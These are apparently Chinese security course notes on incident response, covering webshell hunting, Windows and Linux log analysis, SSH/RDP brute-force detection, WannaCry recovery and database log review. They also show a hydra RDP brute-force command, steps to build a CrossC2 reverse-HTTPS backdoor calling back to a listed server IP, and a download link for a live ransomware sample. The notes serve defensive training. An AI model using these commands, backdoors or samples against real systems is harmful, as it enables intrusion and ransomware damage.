应急响应“小迪安全课堂笔记”web,系统,数据库三方应用
應急響應
- 應急響應初識
- WEB 攻擊應急響應朔源-后門,日志
- WIN 系統攻擊應急響應朔源-后門,日志,流量
- 應急響應-WEB 分析 php&javaweb&自動化工具
- 應急響應流程
- 必備知識點
- 準備工作
- 從表現預估入侵面及權限面進行排查
- 有明確信息網站被入侵
- 無明確信息網站被入侵
- 常見分析方法:
- Windows+IIS+Sql-日志,搜索
- Linux+BT_Nginx+tp5-日志,后門
- Linux+Javaweb+st2-日志,后門,時間
- 360 星圖日志自動分析工具-演示,展望
- 應急響應-win&linux系統 分析后門&勒索病毒&攻擊
- 操作系統(windows,linux)應急響應:
- 常見日志類別及存儲:
- 補充資料:
- 病毒分析
- 病毒查殺
- 病毒動態
- 在線病毒掃描網站
- 攻擊響應-暴力破解(RDP,SSH)-Win,Linux
- windows-rdp
- 演示
- linux爆破-ssh
- 演示
- 控制響應-后門木馬(Webshell,PC)-Win,Linux
- windows:默認配置測試
- linux 借助 CrossC2 項目:netstat -ntulp
- 危害響應-病毒感染(勒索 WannaCry)-Windows
- 自動化響應檢測-Gscan 多重功能腳本測試-Linux
- 涉及資源
- 應急響應-第三方應用分析及應急取證
- 必須知識點:
- 案例
- 系統日志-Win 日志自動神器 LogonTracer平臺-外網內網日志
- LogonTracer平臺搭建使用演示
- 應用分析-數據庫 Mysql&Mssql&Oracle 等日志分析-爆破注入操作
- 演示
- mysql
- mssql
- 模擬測試-自查漏洞模擬滲透測試尋找攻擊源頭-漏洞口令檢索
- 系統漏洞自查win+linux
- 服務漏洞自查win+linux
- 專業要求-自動化 ir-rescue 應急響應取證工具箱-實時為您提供服務
- 涉及資源
應急響應初識
WEB 攻擊應急響應朔源-后門,日志
故事回顧:某顧客反應??的?站首頁出現被篡改,請求支援 。
分析:涉及的攻擊面,涉及的操作權限,涉及的攻擊意圖(修改?站為了?嘛?,可以從修改的?站來分析) ,涉及的攻擊?式等 。
思路1:利??志定位修改時間基數,將前時間進?攻擊分析,后時間進?操作分析 。
思路2:利?后?webshell查殺腳本或?具找到對應后??件,定位第?時間分析。
webshell檢測工具:https://www.cnblogs.com/xiaozi/p/12679777.html
先查看開放的端?,再查看端?所對應的服務
netstat -ano
查看進程-與上圖進程號比對
tasklist /svc
通過任務管理器找到該進程的路徑
看到是由Apache搭建的,Apache有?志記錄
??被修改,??可能是index等地址
通過查看發現這個x.php很特殊,對應找到?站?錄
打開發現是?個后?
可以根據?具的指紋來發現是什么?具
后?查殺?具
WIN 系統攻擊應急響應朔源-后門,日志,流量
AppCompatCacheParser:https://github.com/EricZimmerman/AppCompatCacheParser/releases/
userassistview:https://www.onlinedown.net/soft/628964.htm
后?,病毒會占?資源
使用pchunter64工具
監管進程,標為藍?的為系統外連進程,屬于第三?
看到可以進程,但還是不能確定是??。可以分析,這個進程啟動后有什么操作,對外連接嗎?
查看?絡,發現有?絡連接,可以確定是??
userassisview工具,查看執行文件的記錄
檢查?件執?記錄,可以?來分析??的執?時間
再通過這個時間去查找?志前后
應急響應-WEB 分析 php&javaweb&自動化工具
應急響應流程
保護階段,分析階段,復現階段,修復階段,建議階段
目的:分析出攻擊時間,攻擊操作,攻擊后果,安全修復等并給出合理解決方案。
保護階段:直接斷網,保護現場,看是否能夠恢復數據。
分析階段:對入侵過程進行分析,常見方法為指紋庫搜索、日志分析、后門追查分析、漏洞檢查分析等。
復現階段:還原攻擊過程,模擬攻擊者入侵思路,關注攻擊者在系統中應用的漏洞、手法。
修復階段:分析原因后,修補相關系統、應用漏洞,如果存在后門或弱口令,及時清除并整改。
建議階段:對攻擊者利用的漏洞進行修補,加強系統安全同時提高安全意識。
必備知識點
1、熟悉常見的web安全攻擊技術
2、熟悉相關日志啟用以及存儲查看等
3、熟悉日志中記錄數據分類和分析等
準備工作
1.收集目標服務器各類信息
2.部署相關分析軟件及平臺等
3.整理相關安全滲透工具指紋庫
4.針對異常表現第一時間觸發思路
從表現預估入侵面及權限面進行排查
有明確信息網站被入侵
基于時間: 如果受害方提供了文件被修改日期、異常登錄日期,那么我們就可以鎖定這一時期的相關日志進行查看,不必去大海落枕一天天地看日志了。從而有針對性地對目標攻擊事件進行分析。
基于操作 : 如果受害方提供了被刪除、被加密的數據、文件位置,如數據庫、磁盤等,那么我們就可以根據攻擊者的操作判斷它入侵了哪些地方并可能分析出攻擊過程。
基于指紋 : 如果受害方只說網頁被修改、網站被上馬,那么我們就可以攻擊工具的指紋、木馬的指紋、病毒的指紋、修改的內容等判斷攻擊者使用了何種工具、處于何種技術水平。
基于其他
無明確信息網站被入侵
如果無明確信息的情況下,那么就需要排查全部可能入侵的手法:
1.WEB 漏洞-檢查源碼類別及漏洞情況
2.中間件漏洞-檢查對應版本及漏洞情況
3.第三方應用漏洞-檢查是否存在漏洞應用
4.操作系統層面漏洞-檢查是否存在系統漏洞
5.其他安全問題(口令,后門等)-檢查相關應用口令及后門掃描
常見分析方法:
指紋庫搜索,日志時間分析,后門追查分析,漏洞檢查分析等
Windows+IIS+Sql-日志,搜索
故事回顧:某小企業反應自己的網站出現異常,請求支援。
1、查詢IIS日志文件存放位置
2、根據網站的ID號尋找對應的日志
3、找到日志后查看攻擊語句
4、根據指紋或搜索關鍵字判斷攻擊所采用了何種攻擊
Linux+BT_Nginx+tp5-日志,后門
故事回顧:某黑x哥哥反應自己的網站出現異常,請求支援。
找到寶塔日志文件存放位置,并下載日志到本地
分析日志,產看工具指紋和攻擊請求ip,鎖定攻擊ip
寶塔自帶后門查殺
Linux+Javaweb+st2-日志,后門,時間
故事回顧
說明:apache tomcat日志,存在多種日志文件 access請求日志,catalina調用函數日志。
不同環境有不同日志記錄方式
根據攻擊時間鎖定日志
post請求可疑
這里使用fireseek工具
根據劇情信息-后門文件,查找日志
根據后門代碼搜索日志
360 星圖日志自動分析工具-演示,展望
https://www.cnblogs.com/xiaozi/p/12679777.html webshell檢測工具
https://www.cnblogs.com/xiaozi/p/13198071.html web日志安全分析工具
360星圖:只支持apache、iis、nginx,需配置conf
start.bat啟動
其他好用工具還有ELK、Splunk、FileSeek。其中ELK、Splunk部署比較麻煩
應急響應-win&linux系統 分析后門&勒索病毒&攻擊
操作系統(windows,linux)應急響應:
1.常見危害:
暴力破解:針對系統有包括rdp、ssh、telnet等,針對服務有包括mysql、ftp等,一般可以通過超級弱口令工具、hydra進行爆破。
漏洞利用:通過系統、服務的漏洞進行攻擊,如永恒之藍等。
流量攻擊:主要對目標機器進行dos攻擊,從而導致服務器癱瘓。
木馬控制(Webshell,PC 木馬等):主要分為webshell和PC木馬,webshell是存在與網站應用中的,而PC木馬是進入系統進行植入的。目的是對系統進行持久控制。
病毒感染(挖礦,蠕蟲,勒索等):主要分為挖礦病毒、蠕蟲病毒、勒索病毒等,對目標文件或目錄進行加密,用戶需要支付酬金給黑客。
2.常見分析:
計算機賬戶:賬戶異常、賬戶增加,看攻擊者是否留有后門賬戶。
端口:異常端口開放,看是否與外部地址的某個端口建立了鏈接。
進程:異常進程加載,看是否存在異常進程執行(排除系統正常進程)。
網絡:網絡連接異常,看是否對局域網內其他ip地址進行請求(橫向)或自身網絡異常。
啟動項:異常程序開機自啟動,看是否存在開機自啟動的程序,排查是否為惡意程序。
服務:異常服務添加、啟動,看機器上是否存在異常服務(排除系統正常服務)。
定時任務:異常定時任務執行,看機器上是否存在定時任務。
文件:異常文件,看機器上是否存在異常文件,如后門、病毒、木馬等。
常見日志類別及存儲:
Windows
時間查看器>window日志(包括應用程序、安全、Setup、系統、事件)。
linux
cd /var/log
補充資料:
先知應急響應大合集:https://xz.aliyun.com/t/485
https://www.secpulse.com/archives/114019.html
進程查看工具:https://docs.microsoft.com/en-us/sysinternals/
病毒分析
PCHunter:http://www.xuetr.com
火絨劍:https://www.huorong.cn
Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
processhacker:https://processhacker.sourceforge.io/downloads.php
autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
OTL:https://www.bleepingcomputer.com/download/otl/
SysInspector:http://download.eset.com.cn/download/detail/?product=sysinspector
病毒查殺
卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
大蜘蛛:http://free.drweb.ru/download+cureit+free
火絨安全軟件:https://www.huorong.cn
360 殺毒:http://sd.360.cn/download_center.html
病毒動態
CVERC-國家計算機病毒應急處理中心:http://www.cverc.org.cn
微步在線威脅情報社區:https://x.threatbook.cn
火絨安全論壇:http://bbs.huorong.cn/forum-59-1.html
愛毒霸社區:http://bbs.duba.net
騰訊電腦管家:http://bbs.guanjia.qq.com/forum-2-1.html
在線病毒掃描網站
http://www.virscan.org //多引擎在線病毒掃描網
https://habo.qq.com //騰訊哈勃分析系統
https://virusscan.jotti.org //Jotti 惡意軟件掃描系統
http://www.scanvir.com //計算機病毒、手機病毒、可疑文件分析
攻擊響應-暴力破解(RDP,SSH)-Win,Linux
windows-rdp
Windows-LogFusion 載入查看:
事件歸類,事件 ID,事件狀態等,參考百度資料
演示
受害主機-win2012
通過kali模擬攻擊對rdp服務進行暴力破解
hydra -l mac -P /usr/share/wordlists/meta
sploit/password.lst rdp://172.16.54.42 -s
3389 -vV
1、手動查看RDP
在win系統中需開啟審核策略(成功、失敗),同時查看windows日志,關注事件歸類、事件ID、事件狀態等。
可以發現爆破賬戶為mac,黑客主機名為kali
2、Windows-LogFusion工具查看RDP
windows默認日志存儲路徑
打開(此工具可以遠程也可以本地),一般查看系統和安全日志即可。
模擬rdp弱口令攻擊
刷新
雙擊可看以下信息
發現登錄成功信息
根據這些登錄次數信息,可判定是爆破
linux爆破-ssh
Linux-grep 篩選:
1、統計了下日志,確認服務器遭受多少次暴力破解
grep -o “Failed password” /var/log/secure|uniq -c
2、輸出登錄爆破的第一行和最后一行,確認爆破時間范圍:
grep “Failed password” /var/log/secure|head -1
grep “Failed password” /var/log/secure|tail -1
3、進一步定位有哪些 IP 在爆破?
grep “Failed password” /var/log/secure|grep -E -o “(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)”|uniq -c | sort -nr
4、爆破用戶名字典都有哪些?
grep “Failed password” /var/log/secure|perl -e ‘while($_=<>){ /for(.*?) from/; print “$1\n”;}’|uniq -c|sort -nr
5、登錄成功的日期、用戶名、IP:
grep "Accepted " /var/log/secure | awk ‘{print $1,$2,$3,$9,$11}’
grep "Accepted " /var/log/secure | awk ‘{print $11}’ | sort | uniq -c | sort -nr | more
linux日志保存位置
登錄信息會記錄到secure文件中
演示
1、統計下日志,確認服務遭受多少次暴力破解
grep -o “Failed password” /var/log/secure|uniq -c
2、輸出登錄爆破的第一行和最后一行,確認爆破時間范圍
grep “Failed password” /var/log/secure|head -1
grep “Failed password” /var/log/secure|tail -1
3、進一步定位有哪些IP在爆破
grep “Failed password” /var/log/secure|grep -E -o “(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)”|uniq -c | sort -nr
4、爆破用戶名字典都有哪些?
grep “Failed password” /var/log/secure|perl -e ‘while($_=<>){ /for(.*?) from/; print “$1\n”;}’|uniq -c|sort -nr
5、登錄成功的日期、用戶名、IP:
grep "Accepted " /var/log/secure | awk ‘{print $1,$2,$3,$9,$11}’
grep "Accepted " /var/log/secure | awk ‘{print $11}’ | sort | uniq -c | sort -nr | more
控制響應-后門木馬(Webshell,PC)-Win,Linux
windows:默認配置測試
注:利用工具木馬篩選時,windows高版本網絡信息獲取不全(2012及以上)
方式一:借助殺毒軟件
方式二:windows工具(非殺軟)
測試環境:阿里云服務器,已拿到權限,上傳運行cs了后門,已上線。
tcpview工具,win官方,下載地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
此工具主要功能是查看當前運行的進程是否有外連。不過這個工具看不全進程,只能看到一部分。
procexp 同樣win官方進程分析工具-推薦使用
PChunter,網絡上的集成化工具,繼承了win官方工具的功能。火絨劍和這個類似。-推薦
藍色進程代表第三方應用進程。
有些木馬病毒會隱藏,通過這款工具也可以看到
當找到可以信息不確定時,可以使用win官方工具userassisview工具 ,它可以查看win操作文件全部記錄
就可以判斷當前時間有沒有被執行過。
logonsessions工具可查看服務器被那些用戶連接過。這個信息也可以在日志當中分析到。
autoruns工具win官方,查看win啟動的項目,可以篩選可疑的服務名計劃任務和啟動項。
linux 借助 CrossC2 項目:netstat -ntulp
生成linux木馬項目:
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
cs配合CrossC2上線linux參考過程:http://www.adminxe.com/1287.html
1.項目上傳至服務端目錄,給予執行權限
2.配置監聽器:
windows/beacon_https/reverse_https 阿里云記得端口放行
3.生成后門:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
運行生成的木馬文件,linux上線了
通過工具及日志分析或執行記錄查找后門問題 ——linux詳見自動化響應檢測-Gscan 多重功能腳本測試-Linux
危害響應-病毒感染(勒索 WannaCry)-Windows
勒索只針對windows
詳細說明中毒表現及恢復指南
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html
永恒之藍樣本(勒索病毒):https://bbs.pediy.com/thread-217586-1.htm
勒索樣本:https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取碼:xiao
這里用虛擬機演示,此虛擬機感染勒索病毒
所有文件都被加密
解決方法:
1、各種解密工具
2、花錢解密
解密成功概率都不大
為什么會中毒?
1、基于漏洞,系統沒有打補丁。
2、瞎b下載。
自動化響應檢測-Gscan 多重功能腳本測試-Linux
地址:https://github.com/grayddq/GScan/
執行,自動檢測腳本
查看端口和進程,定位木馬
若采取人工的方式的話就直接鏈接服務器,查找日志文件,通過各種類日志篩選可疑信息。
涉及資源
https://xz.aliyun.com/t/485
https://lesuobingdu.360.cn/
https://github.com/gloxec/CrossC2/
https://github.com/darkr4y/geacon/
https://github.com/grayddq/GScan/
https://bbs.pediy.com/thread-217586-1.htm
https://www.nomoreransom.org/zh/index.html
https://docs.microsoft.com/en-us/sysinternals/
https://www.secpulse.com/archives/114019.html
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取碼xiao
應急響應-第三方應用分析及應急取證
必須知識點:
1.第三方應用由于是選擇性安裝,如何做好信息收集和漏洞探針也是獲取攻擊者思路的重要操作,除去本身漏洞外,提前預知或口令相關攻擊也要進行篩選。
2.排除三方應用攻擊行為,自查漏洞分析攻擊者思路,人工配合工具腳本。
3.由于工具或腳本更新迭代快,分類復雜,打造自己的工具箱迫在眉睫。
案例
系統日志-Win 日志自動神器 LogonTracer平臺-外網內網日志
如何安裝使用:https://github.com/JPCERTCC/LogonTracer/wiki/
linux 安裝使用筆記:阿里云主機記得開放端口及關閉防火墻
1.下載并解壓 neo4j:tar -zvxf neo4j-community-4.2.1-unix.tar
2.安裝 java11 環境:sudo yum install java-11-openjdk -y
3.修改 neo4j 配置保證外部訪問:
dbms.connector.bolt.listen_address=0.0.0.0:7687
dbms.connector.http.listen_address=0.0.0.0:7474
./bin/neo4j console &
4.下載 LogonTracer 并安裝庫:
git clone https://github.com/JPCERTCC/LogonTracer.git
pip3 install -r requirements.txt
5.啟動 LogonTracer 并導入日志文件分析
python3 logontracer.py -r -o [PORT] -u [USERNAME] -p [PASSWORD] -s [IP 地址]
python3 logontracer.py -r -o 8080 -u neo4j -p xiaodi -s 47.98.99.126
python3 logontracer.py -e [EVTX 文件] -z [時區] -u [用戶名] -p [密碼] -s [IP 地址]
python3 logontracer.py -e Security.evtx -z -13 -u neo4j -p xiaodi -s 127.0.0.1
6.刷新訪問 LogonTracer-web_gui 查看分析結果
LogonTracer平臺搭建使用演示
1、下載:git clone https://github.com/neo4j/neo4j tar -zvxf neo4j-community-4.2.1-unix.tar
2、安裝java11環境
sudo yum install java-11-openjdk -y
3、修改neo4j配置保證外部訪問
dbms.connector.bolt.listen_address=0.0.0.0:7687
4、開啟neo4j
./bin/neo4j console &
5、下載Logontracer并安裝庫
git clone https://github.com/JPCERTCC/Log onTracer.git
pip3 install -r requirements.txt
6、啟動Logontracer并導入日志分析文件
python3 logontracer.py -r -o [PORT] -u [U SERNAME] -p [PASSWORD] -s [IP ]
python3 logontracer.py -r -o 8080 -u neo4 j -p xiaodi -s 47.98.99.126
python3 logontracer.py -e [EVTX ] -z [] -u [] -p [] -s [IP ]
python3 logontracer.py -e Security.evtx -z -13 -u neo4j -p xiaodi -s 127.0.0.1
7、刷新訪問LogonTracer-web_gui,查看分析結果
應用分析-數據庫 Mysql&Mssql&Oracle 等日志分析-爆破注入操作
常見的數據庫攻擊包括弱口令、SQL 注入、提升權限、竊取備份等。對數據庫日志進行分析,可以發現攻擊行為,進一步還原攻擊場景及追溯攻擊源。
Mysql:啟用,記錄,分析(分析 SQL 注入及口令登錄爆破等)
show variables like ‘%general%’;
SET GLOBAL general_log = ‘On’;
SET GLOBAL general_log_file = ‘/var/lib/mysql/mysql.log’;
Mssql:查看,跟蹤,分析(配置跟蹤可分析操作,查看日志可分析登錄等)
演示
mysql
1、日志啟用并查看
show variables like"%gengeral"; SETGLOBAL general_log ='On'; # mysql SET GLABAL general_log_file ='/var/lib/m ysql/mysql.log'
2、通過超級弱口令工具(snetcraker)對目標進行爆破模擬攻擊
3、查看日志并分析
mssql
1、查看日志
2、配置跟蹤文件
3、對mssql進行攻擊并實時查看日志
模擬測試-自查漏洞模擬滲透測試尋找攻擊源頭-漏洞口令檢索
主要針對兩種情況:
1.日志被刪除或沒價值信息
2.沒有思路進行分析可以采用模擬滲透
1.windows,linux 系統漏洞自查:
WindowsVulnScan,linux-exploit-suggester
D:\Myproject\venv\Scripts\python.exe cve-check.py -C -f KB.json
./linux-exploit-suggester.sh
2.windows,linux 服務漏洞自查:
windows:Get-WmiObject -class Win32_Product
linux:LinEnum.sh
searchsploit weblogic
利用前期信息收集配合 searchsploit 進行應用服務協議等漏洞檢索
3.windows,linux 協議弱口令自查-工具探針或人工獲取判斷-snetcraker
系統漏洞自查win+linux
主要工具是WindowsVulnScan,linux-exploit-suggester
windows
D:\Myproject\venv\Scripts\python.exe cve-check.py -C -f KB.json
如果出現報錯,將KB.json切換為utf-8模式
linux
./linux-exploit-suggester.sh
工具地址:
https://github.com/chroblert/WindowsVulnScan
https://github.com/mzet-/linux-exploit-suggester
服務漏洞自查win+linux
windows
Get-WmiObject -class Win32_Product
Linux
https://github.com/rebootuser/LinEnum
./LinEnum.sh
根據檢索出來的服務進行漏洞掃描
主要使用searchsploit,比如weblogic
searchsploit weblogic
其中查詢的漏洞分別為dos,local,remote,webapps
專業要求-自動化 ir-rescue 應急響應取證工具箱-實時為您提供服務
https://github.com/diogo-fernan/ir-rescue
分析腳本工具原理,嘗試自己進行編寫修改,成為自己的工具箱殺器。
主要用于下載各種應急響應工具,打造自己的應急工具箱。
涉及資源
https://github.com/rebootuser/LinEnum
https://github.com/diogo-fernan/ir-rescue
https://github.com/offensive-security/exploitdb
https://github.com/chroblert/WindowsVulnScan
https://github.com/JPCERTCC/LogonTracer.git
https://github.com/mzet-/linux-exploit-suggester
https://pan.baidu.com/s/1tQS1mUelmEh3I68AL7yXGg 提取碼:xiao
總結
以上是生活随笔為你收集整理的应急响应“小迪安全课堂笔记”web,系统,数据库三方应用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Linux 的变量类型
- 下一篇: MPEG-4 AVC/H.264 视频编